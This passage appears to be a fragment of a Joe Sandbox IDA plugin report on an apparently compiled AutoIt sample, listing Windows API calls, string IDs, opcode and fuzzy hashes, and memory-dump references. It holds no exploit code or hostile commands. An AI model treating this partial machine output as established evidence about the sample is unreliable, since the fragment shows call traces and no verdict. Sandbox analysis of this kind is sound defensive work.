                          • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0076B270
                          Similarity
                          • API ID: InputSendkeybd_event
                          • String ID:
                          • API String ID: 3536248340-0
                          APIs
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007611FC), ref: 007610D4
                          • CloseHandle.KERNEL32(?,?,007611FC), ref: 007610E9
                          Similarity
                          • API ID: AdjustCloseHandlePrivilegesToken
                          • String ID:
                          • API String ID: 81990902-0
                          APIs
                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00736766,?,?,00000008,?,?,0073FEFE,00000000), ref: 00736998
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID:
                          • API String ID: 3997070919-0
                          Strings
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          APIs
                          • BlockInput.USER32(00000001), ref: 0077EABD
                          Similarity
                          • API ID: BlockInput
                          • String ID:
                          • API String ID: 3456056419-0
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,007203EE), ref: 007209DA
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          Strings
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          Strings
                          Similarity
                          • API ID:
                          • String ID: 0&}
                          • API String ID: 0-910209575
                          • Opcode ID: 7de6beec07c6d8d7f6ac8e9adef1ee298ef86a72ddede826677d7c49c78fd660
                          • Instruction ID: 320f1ef74768164018f07010d17f4718938b5a3e8f27150fa66dcb2e42e8871b
                          • Opcode Fuzzy Hash: 7de6beec07c6d8d7f6ac8e9adef1ee298ef86a72ddede826677d7c49c78fd660
                          • Instruction Fuzzy Hash: 8621A8327216118BDB28CF79C81267E73E5A764310F19CA2EE4A7C37D1DE39A905C794
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 63c9806b3b2e628cede65ba276a0613d13e68530c5af9a3ae3489e316115d760
                          • Instruction ID: 4b73cb52583a0e08dcf4ed86eba3e5c74ce06cbc43148dfc147f4fb302c679d8
                          • Opcode Fuzzy Hash: 63c9806b3b2e628cede65ba276a0613d13e68530c5af9a3ae3489e316115d760
                          • Instruction Fuzzy Hash: 3E321362D29F414DE72B9638C8223356649AFB73C5F15D727E81AB5DA7EB2DC4C38100
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 14620c4cd04780aee4a01c3d0fe6bfe60cfdfc753956e444d6a869885518e540
                          • Instruction ID: 9c9131c7025a3e0b35a6a48707e85508252542f51c2fdb0c1c25cb4542bbc540
                          • Opcode Fuzzy Hash: 14620c4cd04780aee4a01c3d0fe6bfe60cfdfc753956e444d6a869885518e540
                          • Instruction Fuzzy Hash: 3E321731A003058FDF26CEA8C4947FD7BA1EB45302F28856ADC49DB291E67CDD89DB94
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f02e6b4b92bb94e6d82461a265f9d35dea44164434903e777b90cc52010556c
                          • Instruction ID: 4f6cd95265e02e5a5f839d70245a26f32ea1e691ca29f4e7e06a330a68611c58
                          • Opcode Fuzzy Hash: 8f02e6b4b92bb94e6d82461a265f9d35dea44164434903e777b90cc52010556c
                          • Instruction Fuzzy Hash: A822A2B0E04609DFDF14CF68D845AAEB7F5FF44300F148629E816AB292EB39AD55CB50
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d560d2131baa7f3e671f95e49c55aedee1e28c7966a6281fabaf447ee02d8639
                          • Instruction ID: 58ab2b403b317675b5b269d2bcd297ab9d548e2c7c08a8edbd9077277ce9e2f4
                          • Opcode Fuzzy Hash: d560d2131baa7f3e671f95e49c55aedee1e28c7966a6281fabaf447ee02d8639
                          • Instruction Fuzzy Hash: A502B5B0E00205EFDB04DF64D885AAEB7F1FF44310F118169E9169B2D1EB39EA54CB91
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                          • Instruction ID: 9e92e5e231fd5340c43ea086814f31d730e69c3155d06a0e70a2c8fdb5d3f7ba
                          • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                          • Instruction Fuzzy Hash: E99189726090F34ADB29463EA57403EFFE17A623A235A079DD4F2CB1C5FE28D954D620
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00782B30
                          • DeleteObject.GDI32(00000000), ref: 00782B43
                          • DestroyWindow.USER32 ref: 00782B52
                          • GetDesktopWindow.USER32 ref: 00782B6D
                          • GetWindowRect.USER32(00000000), ref: 00782B74
                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00782CA3
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00782CB1
                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782CF8
                          • GetClientRect.USER32(00000000,?), ref: 00782D04
                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00782D40
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782D62
                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782D75
                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782D80
                          • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782D89
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782D98
                          • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782DA1
                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782DA8
                          • GlobalFree.KERNEL32(00000000), ref: 00782DB3
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782DC5
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0079FC38,00000000), ref: 00782DDB
                          • GlobalFree.KERNEL32(00000000), ref: 00782DEB
                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00782E11
                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00782E30
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782E52
                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078303F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                          • String ID: $AutoIt v3$DISPLAY$static
                          • API String ID: 2211948467-2373415609
                          • Opcode ID: 4c25efc3439d027a08ec68ebdb2c82ab6cab3d2b127d1ff3a31e6c967418cf19
                          • Instruction ID: ae79f387ba1d755d0cfbec3f85f8c3bd469552c3a74df14bfc4b1d02c544d31c
                          • Opcode Fuzzy Hash: 4c25efc3439d027a08ec68ebdb2c82ab6cab3d2b127d1ff3a31e6c967418cf19
                          • Instruction Fuzzy Hash: 7B027E71900204EFDB15DFA4CC89EAE7BB9FF48715F008159F915AB2A1DB78AD02CB64
                          APIs
                          • SetTextColor.GDI32(?,00000000), ref: 0079712F
                          • GetSysColorBrush.USER32(0000000F), ref: 00797160
                          • GetSysColor.USER32(0000000F), ref: 0079716C
                          • SetBkColor.GDI32(?,000000FF), ref: 00797186
                          • SelectObject.GDI32(?,?), ref: 00797195
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 007971C0
                          • GetSysColor.USER32(00000010), ref: 007971C8
                          • CreateSolidBrush.GDI32(00000000), ref: 007971CF
                          • FrameRect.USER32(?,?,00000000), ref: 007971DE
                          • DeleteObject.GDI32(00000000), ref: 007971E5
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00797230
                          • FillRect.USER32(?,?,?), ref: 00797262
                          • GetWindowLongW.USER32(?,000000F0), ref: 00797284
                            • Part of subcall function 007973E8: GetSysColor.USER32(00000012), ref: 00797421
                            • Part of subcall function 007973E8: SetTextColor.GDI32(?,?), ref: 00797425
                            • Part of subcall function 007973E8: GetSysColorBrush.USER32(0000000F), ref: 0079743B
                            • Part of subcall function 007973E8: GetSysColor.USER32(0000000F), ref: 00797446
                            • Part of subcall function 007973E8: GetSysColor.USER32(00000011), ref: 00797463
                            • Part of subcall function 007973E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00797471
                            • Part of subcall function 007973E8: SelectObject.GDI32(?,00000000), ref: 00797482
                            • Part of subcall function 007973E8: SetBkColor.GDI32(?,00000000), ref: 0079748B
                            • Part of subcall function 007973E8: SelectObject.GDI32(?,?), ref: 00797498
                            • Part of subcall function 007973E8: InflateRect.USER32(?,000000FF,000000FF), ref: 007974B7
                            • Part of subcall function 007973E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007974CE
                            • Part of subcall function 007973E8: GetWindowLongW.USER32(00000000,000000F0), ref: 007974DB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                          • String ID:
                          • API String ID: 4124339563-0
                          • Opcode ID: 9c28bded8f5717b88ee2b3f53798b6e949181580000b7acd66f0af1534463561
                          • Instruction ID: b344b4b66680d151031df0f73913cd2bc26e6ff2b6361f9b583a27f5decda50c
                          • Opcode Fuzzy Hash: 9c28bded8f5717b88ee2b3f53798b6e949181580000b7acd66f0af1534463561
                          • Instruction Fuzzy Hash: 44A1BF72018305EFDF069F64EC48A6B7BB9FF88320F104A1AF962961E1D738E945CB55
                          APIs
                          • DestroyWindow.USER32(?,?), ref: 00718E14
                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00756AC5
                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00756AFE
                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00756F43
                            • Part of subcall function 00718F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00718BE8,?,00000000,?,?,?,?,00718BBA,00000000,?), ref: 00718FC5
                          • SendMessageW.USER32(?,00001053), ref: 00756F7F
                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00756F96
                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00756FAC
                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00756FB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                          • String ID: 0
                          • API String ID: 2760611726-4108050209
                          • Opcode ID: e1c9e46a47394e0047ab696072fa383ac8e7700f5853f4d226a94a96a7f2ee39
                          • Instruction ID: 893f710157cf98e5a606125bff6b5704404e39c6e1d6f860f1e4c991e740cabe
                          • Opcode Fuzzy Hash: e1c9e46a47394e0047ab696072fa383ac8e7700f5853f4d226a94a96a7f2ee39
                          • Instruction Fuzzy Hash: 2C12C170601241EFDB25CF28C854BE5B7F1FB45302F948469F8858B2A1CB79EC9ACB91
                          APIs
                          • DestroyWindow.USER32(00000000), ref: 0078273E
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0078286A
                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 007828A9
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 007828B9
                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00782900
                          • GetClientRect.USER32(00000000,?), ref: 0078290C
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00782955
                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00782964
                          • GetStockObject.GDI32(00000011), ref: 00782974
                          • SelectObject.GDI32(00000000,00000000), ref: 00782978
                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00782988
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00782991
                          • DeleteDC.GDI32(00000000), ref: 0078299A
                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007829C6
                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 007829DD
                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00782A1D
                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00782A31
                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00782A42
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00782A77
                          • GetStockObject.GDI32(00000011), ref: 00782A82
                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00782A8D
                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00782A97
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                          • API String ID: 2910397461-517079104
                          • Opcode ID: 31a38660a15cb58638a59bf39fe8f93d5262362d0cb8aee0e21cea4945aaf31a
                          • Instruction ID: 832600789a0975322ede65570ea71c65c5f9dd17dd9df425e40f551ce601c11f
                          • Opcode Fuzzy Hash: 31a38660a15cb58638a59bf39fe8f93d5262362d0cb8aee0e21cea4945aaf31a
                          • Instruction Fuzzy Hash: 70B15BB1A40205BFEB14DFA8DC49EAE7BB9EB08711F008115FA15E72D1D778AD41CBA4
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00774AED
                          • GetDriveTypeW.KERNEL32(?,0079CB68,?,\\.\,0079CC08), ref: 00774BCA
                          • SetErrorMode.KERNEL32(00000000,0079CB68,?,\\.\,0079CC08), ref: 00774D36
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorMode$DriveType
                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                          • API String ID: 2907320926-4222207086
                          • Opcode ID: d08352333028dab6b4e0b3cf336cc7e91b56bea43c5fbc8cd213e0081b3f1c80
                          • Instruction ID: 09d7111138d36ef658c7258f6089b370be6a6a9d6f2c87a2a59a1ade79b7f7b7
                          • Opcode Fuzzy Hash: d08352333028dab6b4e0b3cf336cc7e91b56bea43c5fbc8cd213e0081b3f1c80
                          • Instruction Fuzzy Hash: 7261ADB1705105DBCF15DB28CAD6E69B7F0AB04380B24C52DE80AAB692DB3DED41DB61
                          APIs
                          • GetSysColor.USER32(00000012), ref: 00797421
                          • SetTextColor.GDI32(?,?), ref: 00797425
                          • GetSysColorBrush.USER32(0000000F), ref: 0079743B
                          • GetSysColor.USER32(0000000F), ref: 00797446
                          • CreateSolidBrush.GDI32(?), ref: 0079744B
                          • GetSysColor.USER32(00000011), ref: 00797463
                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00797471
                          • SelectObject.GDI32(?,00000000), ref: 00797482
                          • SetBkColor.GDI32(?,00000000), ref: 0079748B
                          • SelectObject.GDI32(?,?), ref: 00797498
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 007974B7
                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007974CE
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 007974DB
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0079752A
                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00797554
                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00797572
                          • DrawFocusRect.USER32(?,?), ref: 0079757D
                          • GetSysColor.USER32(00000011), ref: 0079758E
                          • SetTextColor.GDI32(?,00000000), ref: 00797596
                          • DrawTextW.USER32(?,007970F5,000000FF,?,00000000), ref: 007975A8
                          • SelectObject.GDI32(?,?), ref: 007975BF
                          • DeleteObject.GDI32(?), ref: 007975CA
                          • SelectObject.GDI32(?,?), ref: 007975D0
                          • DeleteObject.GDI32(?), ref: 007975D5
                          • SetTextColor.GDI32(?,?), ref: 007975DB
                          • SetBkColor.GDI32(?,?), ref: 007975E5
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                          • String ID:
                          • API String ID: 1996641542-0
                          • Opcode ID: b05db585a8a2e392cbeeff0c2643444768e24618f951f947d4113941d9e4e9dd
                          • Instruction ID: 00cdc8b9b4dd8f046598eed0571f9d0f134e503b87fe9abfbd410973840a4b12
                          • Opcode Fuzzy Hash: b05db585a8a2e392cbeeff0c2643444768e24618f951f947d4113941d9e4e9dd
                          • Instruction Fuzzy Hash: 98616D72900218AFDF059FA4DC49EEEBFB9EB08320F118116F915AB2A1D7789951CF94
                          APIs
                          • GetCursorPos.USER32(?), ref: 00791128
                          • GetDesktopWindow.USER32 ref: 0079113D
                          • GetWindowRect.USER32(00000000), ref: 00791144
                          • GetWindowLongW.USER32(?,000000F0), ref: 00791199
                          • DestroyWindow.USER32(?), ref: 007911B9
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007911ED
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0079120B
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0079121D
                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 00791232
                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00791245
                          • IsWindowVisible.USER32(00000000), ref: 007912A1
                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007912BC
                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 007912D0
                          • GetWindowRect.USER32(00000000,?), ref: 007912E8
                          • MonitorFromPoint.USER32(?,?,00000002), ref: 0079130E
                          • GetMonitorInfoW.USER32(00000000,?), ref: 00791328
                          • CopyRect.USER32(?,?), ref: 0079133F
                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 007913AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                          • String ID: ($0$tooltips_class32
                          • API String ID: 698492251-4156429822
                          • Opcode ID: 03aaf519fb8df9674251b6c6133ed048d1a174ee8f52e21014430a5e9fd355f1
                          • Instruction ID: b411a68145557f0fb3aa6d5eb1e26dd316678a9da65abf54db09ce1437ba62a5
                          • Opcode Fuzzy Hash: 03aaf519fb8df9674251b6c6133ed048d1a174ee8f52e21014430a5e9fd355f1
                          • Instruction Fuzzy Hash: FFB19D71604341EFDB00DF64D888B6ABBE4FF88350F408919F9999B2A1CB75E855CB92
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 007902E5
                          • _wcslen.LIBCMT ref: 0079031F
                          • _wcslen.LIBCMT ref: 00790389
                          • _wcslen.LIBCMT ref: 007903F1
                          • _wcslen.LIBCMT ref: 00790475
                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007904C5
                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00790504
                            • Part of subcall function 0071F9F2: _wcslen.LIBCMT ref: 0071F9FD
                            • Part of subcall function 0076223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00762258
                            • Part of subcall function 0076223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0076228A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
